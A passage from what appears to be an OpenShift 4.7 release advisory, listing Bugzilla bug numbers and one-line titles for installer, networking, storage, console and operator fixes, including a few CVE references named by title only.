1895423 - unable to edit an application with a custom builder image 1895430 - unable to edit custom template application 1895509 - Backup taken on one master cannot be restored on other masters 1895537 - [sig-imageregistry][Feature:ImageExtract] Image extract should extract content from an image 1895838 - oc explain description contains '/' 1895908 - "virtio" option is not available when modifying a CD-ROM to disk type 1895909 - e2e-metal-ipi-ovn-dualstack is failing 1895919 - NTO fails to load kernel modules 1895959 - configuring webhook token authentication should prevent cluster upgrades 1895979 - Unable to get coreos-installer with --copy-network to work 1896101 - [cnv][automation] Added negative tests for migration from VMWare and RHV 1896160 - CI: Some cluster operators are not ready: marketplace (missing: Degraded) 1896188 - [sig-cli] oc debug deployment configs from a build: local-busybox-1-build not completed 1896218 - Occasional GCP install failures: Error setting IAM policy for project ...: googleapi: Error 400: Service account ... does not exist., badRequest 1896229 - Current Rate of Bytes Received and Current Rate of Bytes Transmitted data can not be loaded 1896244 - Found a panic in storage e2e test 1896296 - Git links should avoid .git as part of the URL and should not link git:// urls in general 1896302 - [e2e][automation] Fix 4.6 test failures 1896365 - [Migration]The SDN migration cannot revert under some conditions 1896384 - [ovirt IPI]: local coredns resolution not working 1896446 - Git clone from private repository fails after upgrade OCP 4.5 to 4.6 1896529 - Incorrect instructions in the Serverless operator and application quick starts 1896645 - documentationBaseURL needs to be updated for 4.7 1896697 - [Descheduler] policy.yaml param in cluster configmap is empty 1896704 - Machine API components should honour cluster wide proxy settings 1896732 - "Attach to Virtual Machine OS" button should not be visible on old clusters 1896866 - File /etc/NetworkManager/system-connections/default_connection.nmconnection is incompatible with SR-IOV operator 1896898 - ovs-configuration.service fails when multiple IPv6 default routes are provided via RAs over the same interface and deployment bootstrap fails 1896918 - start creating new-style Secrets for AWS 1896923 - DNS pod /metrics exposed on anonymous http port 1896977 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters 1897003 - VNC console cannot be connected after visit it in new window 1897008 - Cypress: reenable check for 'aria-hidden-focus' rule & checkA11y test for modals 1897026 - [Migration] With updating optional network operator configuration, migration stucks on MCO 1897039 - router pod keeps printing log: template "msg"="router reloaded" "output"="[WARNING] 316/065823 (15) : parsing [/var/lib/haproxy/conf/haproxy.config:52]: option 'http-use-htx' is deprecated and ignored 1897050 - [IBM Power] LocalVolumeSet provisions boot partition as PV. 1897073 - [OCP 4.5] wrong netid assigned to Openshift projects/namespaces 1897138 - oVirt provider uses depricated cluster-api project 1897142 - When scaling replicas to zero, Octavia loadbalancer pool members are not updated accordingly 1897252 - Firing alerts are not showing up in console UI after cluster is up for some time 1897354 - Operator installation showing success, but Provided APIs are missing 1897361 - The MCO GCP-OP tests fail consistently on containerruntime tests with "connection refused" 1897412 - [sriov]disableDrain did not be updated in CRD of manifest 1897423 - Max unavailable and Max surge value are not shown on Deployment Config Details page 1897516 - Baremetal IPI deployment with IPv6 control plane fails when the nodes obtain both SLAAC and DHCPv6 addresses as they set their hostname to 'localhost' 1897520 - After restarting nodes the image-registry co is in degraded true state. 1897584 - Add casc plugins 1897603 - Cinder volume attachment detection failure in Kubelet 1897604 - Machine API deployment fails: Kube-Controller-Manager can't reach API: "Unauthorized" 1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers 1897641 - Baremetal IPI with IPv6 control plane: nodes respond with duplicate packets to ICMP6 echo requests 1897676 - [CI] [Azure] [UPI] CI failing since 4.6 changes in ignition 1897830 - [GSS] Unable to deploy OCS 4.5.2 on OCP 4.6.1, cannotCreate OCS Cluster Service1897891 - [RFE][v2v][UI][CNV VM import] Providing error message or/and block migration when vddk-init-image is missing 1897897 - ptp lose sync openshift 4.6 1898036 - no network after reboot (IPI) 1898045 - AWS EBS CSI Driver can not get updated cloud credential secret automatically 1898097 - mDNS floods the baremetal network 1898118 - Lack of logs on some image stream tests make hard to find root cause of a problem 1898134 - Descheduler logs show absolute values instead of percentage when LowNodeUtilization strategy is applied 1898159 - kcm operator shall pass --allocate-node-cidrs=false to kcm for ovn-kube and openshift-sdn cluster 1898174 - [OVN] EgressIP does not guard against node IP assignment 1898194 - GCP: can't install on custom machine types 1898238 - Installer validations allow same floating IP for API and Ingress 1898268 - [OVN]:make checkbroken on 4.6 1898289 - E2E test: Use KUBEADM_PASSWORD_FILE by default 1898320 - Incorrect Apostrophe Translation of "it's" in Scheduling Disabled Popover 1898357 - Within the operatorhub details view, long unbroken text strings do not wrap cause breaking display. 1898407 - [Deployment timing regression] Deployment takes longer with 4.7 1898417 - GCP: the dns targets in Google Cloud DNS is not updated after recreating loadbalancer service 1898487 - [oVirt] Node is not removed when VM has been removed from oVirt engine 1898500 - Failure to upgrade operator when a Service is included in a Bundle 1898517 - Ironic auto-discovery may result in rogue nodes registered in ironic 1898532 - Display names defined in specDescriptors not respected 1898580 - When adding more than one node selector to the sriovnetworknodepolicy, the cni and the device plugin pods are constantly rebooted 1898613 - Whereabouts should exclude IPv6 ranges 1898655 - [oVirt] Node deleted in oVirt should cause the Machine to go into a Failed phase 1898679 - Operand creation form - Required "type: object" properties (Accordion component) are missing red asterisk 1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability 1898745 - installation failing with CVO reporting openshift-samples not rolled out, samples not setting versions in its ClusterOperator 1898839 - Wrong YAML in operator metadata 1898851 - Multiple Pods access the same volume on the same node e2e test cases are missed from aws ebs csi driver e2e test job 1898873 - Remove TechPreview Badge from Monitoring 1898954 - Backup script does not take /etc/kubernetes/static-pod-resources on a reliable way 1899111 - [RFE] Update jenkins-maven-agen to maven36 1899128 - VMI details screen -> show the warning that it is preferable to have a VM only if the VM actually does not exist 1899175 - bump the RHCOS boot images for 4.7 1899198 - Use new packages for ipa ramdisks 1899200 - In Installed Operators page I cannot search for an Operator by it's name 1899220 - Support AWS IMDSv2 1899350 - configure-ovs.sh doesn't configure bonding options 1899433 - When Creating OCS from ocs wizard Step Discover Disks shows Error "An error occurred Not Found" 1899459 - Failed to start monitoring pods once the operator removed from override list of CVO 1899515 - Passthrough credentials are not immediately re-distributed on update 1899575 - update discovery burst to reflect lots of CRDs on openshift clusters 1899582 - update discovery burst to reflect lots of CRDs on openshift clusters 1899588 - Operator objects are re-created after all other associated resources have been deleted 1899600 - Increased etcd fsync latency as of OCP 4.6 1899603 - workers-rhel7 CI jobs failing: Failed to remove rollback: error running rpm-ostree cleanup 1899627 - Project dashboard Active status using small icon 1899725 - Pods table does not wrap well with quick start sidebar open 1899746 - [ovn] error while waiting on flows for pod: OVS sandbox port is no longer active (probably due to a subsequent CNI ADD) 1899760 - etcd_request_duration_seconds_bucket metric has excessive cardinality 1899835 - catalog-operator repeatedly crashes with "runtime error: index out of range [0] with length 0" 1899839 - thanosRuler.resources.requests does not take effect in user-workload-monitoring-config confimap 1899853 - additionalSecurityGroupIDs not working for master nodes 1899922 - NP changes sometimes influence new pods. 1899949 - [Platform] Remove restriction on disk type selection for LocalVolumeSet 1900008 - Fix internationalized sentence fragments in ImageSearch.tsx 1900010 - Fix internationalized sentence fragments in BuildImageSelector.tsx 1900020 - Remove &apos; from internationalized keys 1900022 - Search Page - Top labels field is not applied to selected Pipeline resources 1900030 - disruption_tests: [sig-imageregistry] Image registry remain available failing consistently 1900126 - Creating a VM results in suggestion to create a default storage class when one already exists 1900138 - [OCP on RHV] Remove insecure mode from the installer 1900196 - stalld is not restarted after crash 1900239 - Skip "subPath should be able to unmount" NFS test 1900322 - metal3 pod's toleration for key: node-role.kubernetes.io/master currently matches on exact value matches but should match on Exists 1900377 - [e2e][automation] create new css selector for active users 1900496 - (release-4.7) Collect spec config for clusteroperator resources 1900672 - (s390x) Upgrade from old LUKS to new not working with DASD disks 1900699 - Impossible to add new Node on OCP 4.6 using large ECKD disks - fdasd issue 1900759 - include qemu-guest-agent by default 1900790 - Track all resource counts via telemetry 1900835 - Multus errors when cachefile is not found 1900935 -oc adm release mirrorpanic panic: runtime error 1900989 - accessing the route cannot wake up the idled resources 1901040 - When scaling down the status of the node is stuck on deleting 1901057 - authentication operator health check failed when installing a cluster behind proxy 1901107 - pod donut shows incorrect information 1901111 - Installer dependencies are broken 1901200 - linuxptp-daemon crash when enable debug log level 1901301 - CBO should handle platform=BM without provisioning CR 1901355 - [Azure][4.7] Invalid vm size from customized compute nodes does not fail properly 1901363 - High Podready Latency due to timed out waiting for annotations 1901373 - redundant bracket on snapshot restore button 1901376 - [on-prem] Upgrade from 4.6 to 4.7 failed with "timed out waiting for the condition during waitForControllerConfigToBeCompleted: controllerconfig is not completed: ControllerConfig has not completed: completed(false) running(false) failing(true" 1901395 - "Edit virtual machine template" action link should be removed 1901472 - [OSP] Bootstrap and master nodes use different keepalived unicast setting 1901517 - RHCOS 4.6.1 uses a single NetworkManager connection for multiple NICs when using default DHCP 1901531 - Console returns a blank page while trying to create an operator Custom CR with Invalid Schema 1901594 - Kubernetes resource CRUD operations.Kubernetes resource CRUD operations Pod "before all" hook for "creates the resource instance" 1901604 - CNO blocks editing Kuryr options 1901675 - [sig-network] multicast when using one of the plugins 'redhat/openshift-ovs-multitenant, redhat/openshift-ovs-networkpolicy' should allow multicast traffic in namespaces where it is enabled 1901909 - The device plugin pods / cni pod are restarted every 5 minutes 1901982 - [sig-builds][Feature:Builds] build can reference a cluster service with a build being created from new-build should be able to run a build that references a cluster service 1902019 - when podTopologySpreadConstraint strategy is enabled for descheduler it throws error 1902059 - Wire a real signer for service accout issuer 1902091 -cluster-image-registry-operatorpod leaves connections open when fails connecting S3 storage 1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service 1902157 - The DaemonSet machine-api-termination-handler couldn't allocate Pod 1902253 - MHC status doesnt set RemediationsAllowed = 0 1902299 - Failed to mirror operator catalog - error: destination registry required 1902545 - Cinder csi driver node pod should add nodeSelector for Linux 1902546 - Cinder csi driver node pod doesn't run on master node 1902547 - Cinder csi driver controller pod doesn't run on master node 1902552 - Cinder csi driver does not use the downstream images 1902595 - Project workloads list view doesn't show alert icon and hover message 1902600 - Container csi-snapshotter in Cinder csi driver needs to use ImagePullPolicy=IfNotPresent 1902601 - Cinder csi driver pods run as BestEffort qosClass 1902653 - [BM][IPI] Master deployment failed: No valid host was found. Reason: No conductor service registered which supports driver redfish for conductor group 1902702 - [sig-auth][Feature:LDAP][Serial] ldap group sync can sync groups from ldap: oc cp over non-existing directory/file fails 1902746 - [BM][IP] Master deployment failed - Base.1.0.GeneralError: database is locked 1902824 - failed to generate semver informed package manifest: unable to determine default channel 1902894 - hybrid-overlay-node crashing trying to get node object during initialization 1902969 - Cannot load vmi detail page 1902981 - It should default to current namespace when create vm from template 1902996 - [AWS] UPI on USGov, bootstrap machine can not fetch ignition file via s3:// URI 1903033 - duplicated lines of imageContentSources is seen when mirror release image to local registry 1903034 - OLM continuously printing debug logs 1903062 - [Cinder csi driver] Deployment mounted volume have no write access 1903078 - Deleting VolumeSnapshotClass makes VolumeSnapshot not Ready 1903107 - Enable vsphere-problem-detector e2e tests 1903164 - OpenShift YAML editor jumps to top every few seconds 1903165 - Improve Canary Status Condition handling for e2e tests 1903172 - Column Management: Fix sticky footer on scroll 1903186 - [Descheduler] cluster logs should report some info when PodTopologySpreadConstraints strategy is enabled 1903188 - [Descheduler] cluster log reports failed to validate server configuration" err="unsupported log format: 1903192 - Role name missing on create role binding form 1903196 - Popover positioning is misaligned for Overview Dashboard status items 1903206 - Ingress controller incorrectly routes traffic to non-ready pods/backends. 1903226 - MutatingWebhookConfiguration pod-identity-webhook does not exclude critical control-plane components 1903248 - Backport Upstream Static Pod UID patch 1903277 - Deprovisioning Not Deleting Security Groups [VpcLimitExceeded on e2e-aws tests] 1903290 - Kubelet repeatedly log the same log line from exited containers 1903346 - PV backed by FC lun is not being unmounted properly and this leads to IO errors / xfs corruption. 1903382 - Panic when task-graph is canceled with a TaskNode with no tasks 1903400 - Migrate a VM which is not running goes to pending state 1903402 - Nic/Disk on VMI overview should link to VMI's nic/disk page 1903414 - NodePort is not working when configuring an egress IP address 1903424 - mapi_machine_phase_transition_seconds_sum doesn't work 1903464 - "Evaluating rule failed" for "record: cluster:kube_persistentvolumeclaim_resource_requests_storage_bytes:provisioner:sum" and "record: cluster:kubelet_volume_stats_used_bytes:provisioner:sum" 1903639 - Hostsubnet gatherer produces wrong output 1903651 - Network Policies are not working as expected with OVN-Kubernetes when traffic hairpins back to the same source through a service 1903660 - Cannot install with Assisted Installer on top of IPv6 since network provider is not started 1903674 - [sig-apps] ReplicationController should serve a basic image on each replica with a private image 1903717 - Handle different Pod selectors for metal3 Deployment 1903733 - Scale up followed by scale down can delete all running workers 1903917 - Failed to load "Developer Catalog" page 1903999 - Httplog response code is always zero 1904026 - The quota controllers should resync on new resources and make progress 1904064 - Automated cleaning is disabled by default 1904124 - DHCP to static lease script doesn't work correctly if starting with infinite leases 1904125 - Boostrap VM .ign image gets added into 'default' pool instead of <cluster-name>-<id>-bootstrap 1904131 - kuryr tempest plugin test test_ipblock_network_policy_sg_rules fails 1904133 - KubeletConfig flooded with failure conditions 1904161 - AlertmanagerReceiversNotConfigured fires unconditionally on alertmanager restart 1904243 - RHCOS 4.6.1 missing ISCSI initiatorname.iscsi ! 1904244 - MissingKey errors for two plugins using i18next.t 1904262 - clusterresourceoverride-operator has version: 1.0.0 every build 1904296 - VPA-operator has version: 1.0.0 every build 1904297 - The index image generated by "opm index prune" leaves unrelated images 1904305 - Should have scroll-down bar for the field which the values list has too many results under dashboards 1904385 - [oVirt] registry cannot mount volume on 4.6.4 -> 4.6.6 upgrade 1904497 - vsphere-problem-detector: Run on vSphere cloud only 1904501 - [Descheduler] descheduler does not evict any pod when PodTopologySpreadConstraint strategy is set 1904502 - vsphere-problem-detector: allow longer timeouts for some operations 1904503 - vsphere-problem-detector: emit alerts 1904538 - [sig-arch][Early] Managed cluster should start all core operators: monitoring: container has runAsNonRoot and image has non-numeric user (nobody) 1904578 - metric scraping for vsphere problem detector is not configured 1904582 - All application traffic broken due to unexpected load balancer change on 4.6.4 -> 4.6.6 upgrade 1904663 - IPI pointer customization MachineConfig always generated 1904679 - [Feature:ImageInfo] Image info should display information about images 1904683 -[sig-builds][Feature:Builds] s2i build with a root user imagetests use docker.io image 1904684 - [sig-cli] oc debug ensure it works with image streams 1904713 - Helm charts with kubeVersion restriction are filtered incorrectly 1904776 - Snapshot modal alert is not pluralized 1904824 - Set vSphere hostname from guestinfo before NM starts 1904941 - Insights status is always showing a loading icon 1904973 - KeyError: 'nodeName' on NP deletion 1904985 - Prometheus and thanos sidecar targets are down 1904993 - Many ampersand special characters are found in strings 1905066 - QE - Monitoring test cases - smoke test suite automation 1905074 - QE -Gherkin linter to maintain standards 1905100 - Too many haproxy processes in default-router pod causing high load average 1905104 - Snapshot modal disk items missing keys 1905115 - CI: dev-scripts fail on 02_configure_host: Failed to start network ostestbm 1905119 - Race in AWS EBS determining whether custom CA bundle is used 1905128 - [e2e][automation] e2e tests succeed without actually execute 1905133 - operator conditions special-resource-operator 1905141 - vsphere-problem-detector: report metrics through telemetry 1905146 - Backend Tests: TestHelmRepoGetter_SkipDisabled failures 1905194 - Detecting broken connections to the Kube API takes up to 15 minutes 1905221 - CVO transitions from "Initializing" to "Updating" despite not attempting many manifests 1905232 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them failing due to inconsistent images between CI and OCP 1905253 - Inaccurate text at bottom of Events page 1905298 - openshift-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory 1905299 - OLM fails to update operator 1905307 - Provisioning CR is missing from must-gather 1905319 - cluster-samples-operator containers are not requesting required memory resource 1905320 - csi-snapshot-webhook is not requesting required memory resource 1905323 - dns-operator is not requesting required memory resource 1905324 - ingress-operator is not requesting required memory resource 1905327 - openshift-kube-scheduler initContainer wait-for-host-port is not requesting required resources: cpu, memory 1905328 - Changing the bound token service account issuer invalids previously issued bound tokens 1905329 - openshift-oauth-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory 1905330 - openshift-monitoring init-textfile is not requesting required resources: cpu, memory 1905338 - QE -Cypress Automation for Add Flow - Database, Yaml, OperatorBacked, PageDetails 1905347 - QE - Design Gherkin Scenarios 1905348 - QE - Design Gherkin Scenarios 1905362 - [sriov] Error message 'Fail to update DaemonSet' always shown in sriov operator pod 1905368 - [sriov] net-attach-def generated from sriovnetwork cannot be restored once it was deleted 1905370 - A-Z/Z-A sorting dropdown on Developer Catalog page is not aligned with filter text input 1905380 - Default to Red Hat/KubeVirt provider if common template does not have provider annotation 1905393 - CMO uses rbac.authorization.k8s.io/v1beta1 instead of rbac.authorization.k8s.io/v1 1905404 - The example of "Remove the entrypoint on the mysql:latest image" foroc image appenddoes not work 1905416 - Hyperlink not working from Operator Description 1905430 - usbguard extension fails to install because of missing correct protobuf dependency version 1905492 - The stalld service has a higher scheduler priority than ksoftirq and rcu{b, c} threads 1905502 - Test flake - unable to get https transport for ephemeral-registry 1905542 - [GSS] The "External" mode option is not available when the OCP cluster is deployed using Redhat Cluster Assisted Installer 4.6. 1905599 - Errant change to lastupdatetime in copied CSV status can trigger runaway csv syncs 1905610 - Fix typo in export script 1905621 - Protractor login test fails against a 4.7 (nightly) Power cluster 1905640 - Subscription manual approval test is flaky 1905647 - Report physical core valid-for-subscription min/max/cumulative use to telemetry 1905696 - ClusterMoreUpdatesModal component did not get internationalized 1905748 - with sharded ingresscontrollers, all shards reload when any endpoint changes 1905761 - NetworkPolicy with Egress policyType is resulting in SDN errors and improper communication within Project 1905778 - inconsistent ingresscontroller between fresh installed cluster and upgraded cluster 1905792 - [OVN]Cannot create egressfirewalll with dnsName 1905889 - Should create SA for each namespace that the operator scoped 1905920 - Quickstart exit and restart 1905941 - Page goes to error after create catalogsource 1905977 - QE ghaekin design scenaio-pipeline metrics ODC-3711 1906032 - Canary Controller: Canary daemonset rolls out slowly in large clusters 1906100 - Disconnected cluster upgrades are failing from the cli, when signature retrieval is being blackholed instead of quickly rejected 1906105 - CBO annotates an existing Metal3 deployment resource to indicate that it is managing it 1906118 - OCS feature detection constantly polls storageclusters and storageclasses 1906120 - 'Create Role Binding' form not setting user or group value when created from a user or group resource 1906121 - [oc] After new-project creation, the kubeconfig file does not set the project 1906134 - OLM should not create OperatorConditions for copied CSVs 1906143 - CBO supports log levels 1906186 - i18n: Translators are not able to translatethiswithout context for alert manager config 1906228 - tuned and openshift-tuned sometimes do not terminate gracefully, slowing reboots 1906274 - StorageClass installed by Cinder csi driver operator should enable the allowVolumeExpansion to support volume resize. 1906276 -oc image appendcan't work with multi-arch image with --filter-by-os='.*' 1906318 - use proper term for Authorized SSH Keys 1906335 - The lastTransitionTime, message, reason field of operatorcondition should be optional 1906356 - Unify Clone PVC boot source flow with URL/Container boot source 1906397 - IPA has incorrect kernel command line arguments 1906441 - HorizontalNav and NavBar have invalid keys 1906448 - Deploy using virtualmedia with provisioning network disabled fails - 'Failed to connect to the agent' in ironic-conductor log 1906459 - openstack: Quota Validation fails if unlimited quotas are given to a project 1906496 - [BUG] Thanos having possible memory leak consuming huge amounts of node's memory and killing them 1906508 - TestHeaderNameCaseAdjust outputs nil error message on some failures 1906511 - Root reprovisioning tests flaking often in CI 1906517 - Validation is not robust enough and may prevent to generate install-confing. 1906518 - Update snapshot API CRDs to v1 1906519 - Update LSO CRDs to use v1 1906570 - Number of disruptions caused by reboots on a cluster cannot be measured 1906588 - [ci][sig-builds] nodes is forbidden: User "e2e-test-jenkins-pipeline-xfghs-user" cannot list resource "nodes" in API group "" at the cluster scope 1906650 - Cannot collect network policy, EgressFirewall, egressip logs with gather_network_logs 1906655 - [SDN]Cannot colloect ovsdb-server.log and ovs-vswitchd.log with gather_network_logs 1906679 - quick start panel styles are not loaded 1906683 - Kn resources are not showing in Topology if triggers has KSVC and IMC as subscriber 1906684 - Event Source creation fails if user selects no app group and switch to yaml and then to form 1906685 - SinkBinding is shown in topology view if underlying resource along with actual source created 1906689 - user can pin to nav configmaps and secrets multiple times 1906691 - Add doc which describes disabling helm chart repository 1906713 - Quick starts not accesible for a developer user 1906718 - helm chart "provided by Redhat" is misspelled 1906732 - Machine API proxy support should be tested 1906745 - Update Helm endpoints to use Helm 3.4.x 1906760 - performance issues with topology constantly re-rendering 1906766 - localizedAutoscaled&Autoscalingpod texts overlap with the pod ring 1906768 - Virtualization nav item is incorrectly placed in the Admin Workloads section 1906769 - topology fails to load with non-kubeadmin user 1906770 - shortcuts on mobiles view occupies a lot of space 1906798 - Dev catalog customization doesn't update console-config ConfigMap 1906806 - Allow installing extra packages in ironic container images 1906808 - [test-disabled] ServiceAccounts should support OIDC discovery of service account issuer 1906835 - Topology view shows add page before then showing full project workloads 1906840 - ClusterOperator should not have status "Updating" if operator version is the same as the release version 1906844 - EndpointSlice and EndpointSliceProxying feature gates should be disabled for openshift-sdn kube-proxy 1906860 - Bump kube dependencies to v1.20 for Net Edge components 1906864 - Quick Starts Tour: Need to adjust vertical spacing 1906866 - Translations of Sample-Utils 1906871 - White screen when sort by name in monitoring alerts page 1906872 - Pipeline Tech Preview Badge Alignment 1906875 - Provide an option to force backup even when API is not available. 1906877 - Placeholder' value in search filter do not match column heading in Vulnerabilities 1906879 - Add missing i18n keys 1906880 - oidcdiscoveryendpoint controller invalidates all TokenRequest API tokens during install 1906896 - No Alerts causes odd empty Table (Need no content message) 1906898 - Missing User RoleBindings in the Project Access Web UI 1906899 - Quick Start - Highlight Bounding Box Issue 1906916 - Teach CVO about flowcontrol.apiserver.k8s.io/v1beta1 1906933 - Cluster Autoscaler should have improved mechanisms for group identifiers 1906935 - Delete resources when Provisioning CR is deleted 1906968 - Must-gather should support collecting kubernetes-nmstate resources 1906986 - Ensure failed pod adds are retried even if the pod object doesn't change 1907199 - Need to upgrade machine-api-operator module version under cluster-api-provider-kubevirt 1907202 - configs.imageregistry.operator.openshift.io cluster does not update its status fields after URL change 1907211 - beta promotion of p&f switched storage version to v1beta1, making downgrades impossible. 1907269 - Tooltips data are different when checking stack or not checking stack for the same time 1907280 - Install tour of OCS not available. 1907282 - Topology page breaks with white screen 1907286 - The default mhc machine-api-termination-handler couldn't watch spot instance 1907287 - [csi-snapshot-webhook] should support both v1beta1 and v1 version when creating volumesnapshot/volumesnapshotcontent 1907293 - Increase timeouts in e2e tests 1907295 - Gherkin script for improve management for helm 1907299 - Advanced Subscription Badge for KMS and Arbiter not present 1907303 - Align VM template list items by baseline 1907304 - Use PF styles for selected template card in VM Wizard 1907305 - Drop 'ISO' from CDROM boot source message 1907307 - Support and provider labels should be passed on between templates and sources 1907310 - Pin action should be renamed to favorite 1907312 - VM Template source popover is missing info about added date 1907313 - ClusterOperator objects cannot be overriden with cvo-overrides 1907328 - iproute-tc package is missing in ovn-kube image 1907329 - CLUSTER_PROFILE env. variable is not used by the CVO 1907333 - Node stuck in degraded state, mcp reports "Failed to remove rollback: error running rpm-ostree cleanup -r: error: Timeout was reached" 1907373 - Rebase to kube 1.20.0 1907375 - Bump to latest available 1.20.x k8s - workloads team 1907378 - Gather netnamespaces networking info 1907380 - kube-rbac-proxy exposes tokens, has excessive verbosity 1907381 - OLM fails to deploy an operator if its deployment template contains a description annotation that doesn't match the CSV one 1907390 - prometheus-adapter: panic after k8s 1.20 bump 1907399 - build log icon link on topology nodes cause app to reload 1907407 - Buildah version not accessible 1907421 - [4.6.1]oc-image-mirror command failed on "error: unable to copy layer" 1907453 - Dev Perspective -> running vm details -> resources -> no data 1907454 - Install PodConnectivityCheck CRD with CNO 1907459 - "The Boot source is also maintained by Red Hat." is always shown for all boot sources 1907475 - Unable to estimate the error rate of ingress across the connected fleet 1907480 -Active alertssection throwing forbidden error for users. 1907518 - Kamelets/Eventsource should be shown to user if they have create access 1907543 - Korean timestamps are shown when users' language preferences are set to German-en-en-US 1907610 - Update kubernetes deps to 1.20 1907612 - Update kubernetes deps to 1.20 1907621 - openshift/installer: bump cluster-api-provider-kubevirt version 1907628 - Installer does not set primary subnet consistently 1907632 - Operator Registry should update its kubernetes dependencies to 1.20 1907639 - pass dual-stack node IPs to kubelet in dual-stack clusters 1907644 - fix up handling of non-critical annotations on daemonsets/deployments 1907660 - Pod list does not render cell height correctly when pod names are too long (dynamic table rerendering issue?) 1907670 - CVE-2020-27846 crewjam/saml: authentication bypass in saml authentication 1907671 - Ingress VIP assigned to two infra nodes simultaneously - keepalived process running in pods seems to fail 1907767 - [e2e][automation]update test suite for kubevirt plugin 1907770 - Recent RHCOS 47.83 builds (from rhcos-47.83.202012072210-0 on) don't allow master and worker nodes to boot 1907792 - Theoverridesof the OperatorCondition cannot block the operator upgrade 1907793 - Surface support info in VM template details 1907812 - 4.7 to 4.6 downgrade stuck in clusteroperator storage 1907822 - [OCP on OSP] openshift-install panic when checking quota with install-config have no flavor set 1907863 - Quickstarts status not updating when starting the tour 1907872 - dual stack with an ipv6 network fails on bootstrap phase 1907874 - QE - Design Gherkin Scenarios for epic ODC-5057 1907875 - No response when try to expand pvc with an invalid size 1907876 - Refactoring record package to make gatherer configurable 1907877 - QE - Automation- pipelines builder scripts 1907883 - Fix Pipleine creation without namespace issue 1907888 - Fix pipeline list page loader 1907890 - Misleading and incomplete alert message shown in pipeline-parameters and pipeline-resources form 1907892 - Unable to edit application deployed using "From Devfile" option 1907893 - navSortUtils.spec.ts unit test failure 1907896 - When a workload is added, Topology does not place the new items well 1907908 - VM Wizard always uses VirtIO for the VM rootdisk regardless what is defined in common-template 1907924 - Enable madvdontneed in OpenShift Images 1907929 - Enable madvdontneed in OpenShift System Components Part 2 1907936 - NTO is not reporting nto_profile_set_total metrics correctly after reboot 1907947 - The kubeconfig saved in tenantcluster shouldn't include anything that is not related to the current context 1907948 - OCM-O bump to k8s 1.20 1907952 - bump to k8s 1.20 1907972 - Update OCM link to open Insights tab 1907989 - DataVolumes was intorduced in common templates - VM creation fails in the UI 1907998 - Gather kube_pod_resource_request/limit metrics as exposed in upstream KEP 1916 1908001 - [CVE-2020-10749] Update github.com/containernetworking/plugins to v.0.8.6 in egress-router-cni 1908014 - e2e-aws-ansible and e2e-aws-helm are broken in ocp-release-operator-sdk 1908035 - dynamic-demo-plugin build does not generate dist directory 1908135 - quick search modal is not centered over topology 1908145 - kube-scheduler-recovery-controller container crash loop when router pod is co-scheduled 1908159 - [AWS C2S] MCO fails to sync cloud config 1908171 - GCP: Installation fails when installing cluster with n1-custom-4-16384custom type (n1-custom-4-16384) 1908180 - Add source for template is stucking in preparing pvc 1908217 - CI: Server-Side Apply should work for oauth.openshift.io/v1: has no tokens 1908231 - [Migration] The pods ovnkube-node are in CrashLoopBackOff after SDN to OVN 1908277 - QE - Automation- pipelines actions scripts 1908280 - Documentation describingignore-volume-azis incorrect 1908296 - Fix pipeline builder form yaml switcher validation issue 1908303 - [CVE-2020-28367 CVE-2020-28366] Remove CGO flag from rhel Dockerfile in Egress-Router-CNI 1908323 - Create button missing for PLR in the search page 1908342 - The new pv_collector_total_pv_count is not reported via telemetry 1908344 - [vsphere-problem-detector] CheckNodeProviderID and CheckNodeDiskUUID have the same name 1908347 - CVO overwrites ValidatingWebhookConfiguration for snapshots 1908349 - Volume snapshot tests are failing after 1.20 rebase 1908353 - QE - Automation- pipelines runs scripts 1908361 - bump to k8s 1.20 1908367 - QE - Automation- pipelines triggers scripts 1908370 - QE - Automation- pipelines secrets scripts 1908375 - QE - Automation- pipelines workspaces scripts 1908381 - Go Dependency Fixes for Devfile Lib 1908389 - Loadbalancer Sync failing on Azure 1908400 - Tests-e2e, increase timeouts, re-add TestArchiveUploadedAndResultsReceived 1908407 - Backport Upstream 95269 to fix potential crash in kubelet 1908410 - Exclude Yarn from VSCode search 1908425 - Create Role Binding form subject type and name are undefined when All Project is selected 1908431 - When the marketplace-operator pod get's restarted, the custom catalogsources are gone, as well as the pods 1908434 - Remove &apos from metal3-plugin internationalized strings 1908437 - Operator backed with no icon has no badge associated with the CSV tag 1908459 - bump to k8s 1.20 1908461 - Add bugzilla component to OWNERS file 1908462 - RHCOS 4.6 ostree removed dhclient 1908466 - CAPO AZ Screening/Validating 1908467 - Zoom in and zoom out in topology package should be sentence case 1908468 - [Azure][4.7] Installer can't properly parse instance type with non integer memory size 1908469 - nbdb failed to come up while bringing up OVNKubernetes cluster 1908471 - OLM should bump k8s dependencies to 1.20 1908484 - oc adm release extract --cloud=aws --credentials-requests dumps all manifests 1908493 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM 1908545 - VM clone dialog does not open 1908557 - [e2e][automation]Miss css id on bootsource and reviewcreate step on wizard 1908562 - Pod readiness is not being observed in real world cases 1908565 - [4.6] Cannot filter the platform/arch of the index image 1908573 - Align the style of flavor 1908583 - bootstrap does not run on additional networks if configured for master in install-config 1908596 - Race condition on operator installation 1908598 - Persistent Dashboard shows events for all provisioners 1908641 - Go back to Catalog Page link on Virtual Machine page vanishes on empty state 1908648 - Skip TestKernelType test on OKD, adjust TestExtensions 1908650 - The title of customize wizard is inconsistent 1908654 - cluster-api-provider: volumes and disks names shouldn't change by machine-api-operator 1908675 - Reenable [sig-storage] CSI mock volume CSI FSGroupPolicy [LinuxOnly] should modify fsGroup if fsGroupPolicy=default [Suite:openshift/conformance/parallel] [Suite:k8s] 1908687 - Option to save user settings separate when using local bridge (affects console developers only) 1908697 - Showkubectl diff command in the oc diff help page 1908715 - Pressing the arrow up key when on topmost quick-search list item it should loop back to bottom 1908716 - UI breaks on click of sidebar of ksvc (if revisions not up) in topology on 4.7 builds 1908717 - "missing unit character in duration" error in some network dashboards 1908746 - [Safari] Drop Shadow doesn't works as expected on hover on workload 1908747 - stale S3 CredentialsRequest in CCO manifest 1908758 - AWS: NLB timeout value is rejected by AWS cloud provider after 1.20 rebase 1908830 - RHCOS 4.6 - Missing Initiatorname 1908868 - Update empty state message for 